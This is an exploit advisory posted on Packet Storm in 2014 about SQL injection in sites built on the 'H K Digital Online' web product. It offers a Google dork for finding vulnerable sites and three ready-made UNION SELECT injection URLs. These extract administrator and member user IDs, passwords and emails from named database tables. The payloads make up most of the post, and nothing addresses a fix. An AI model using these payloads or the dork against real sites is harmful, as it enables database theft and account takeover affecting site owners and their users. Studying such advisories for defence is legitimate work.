H K Digital Online SQL Injection

2014-02-16T00:00:00
ID PACKETSTORM:125237
Type packetstorm
Reporter th3rockst3r
Modified 2014-02-16T00:00:00

Description

                                        
                                            `# Exploit Author:Th3 R0cksT3r  
# Exploit Title: H K Digital Online SQL Injection  
# Date: 15.02.2014  
# Email: th3rockst3r@gmail.com   
# Vendor Homepage: http://www.hkdigitalonline.com/  
# Facebook: Facebook.com/thee.rocksTer  
# Google Dork: inurl:".php?id=" intext:"Powered by H K Digital Online."  
  
  
  
  
=== Material's Description ===  
An attacker can get database info by this vulnerablity.  
  
  
  
Proof Of Concept:  
  
  
1. http://localhost/tender_notice.php?id=-23%27+UNION+SELECT+1,2,3,group_concat%28userid,0x3a,password,0x3a,mainadmin%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo--+  
  
2. http://localhost/blog-inner.php?id=-3%27+UNION+SELECT+1,2,3,4,group_concat%28userid,0x3a,password,0x3a,email%29,6,7,8,9,10,11,12+from+admininfo--+  
  
3. http://localhost/storelocator.php?id=-574+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat%28login,0x3a,passwd,0x3a,email%29,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+members--  
  
  
  
  
# Greetz:Back Bone,Illûmïnåté Ðëmøñ,Orions Hunter,Dark Knight Sparda,Gh0st KilL3r,Luge Racer,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,  
Sparrow,Bd Matrix,Cyber Blader,BD BLACK HAT and All Bangladeshi Hackers  
`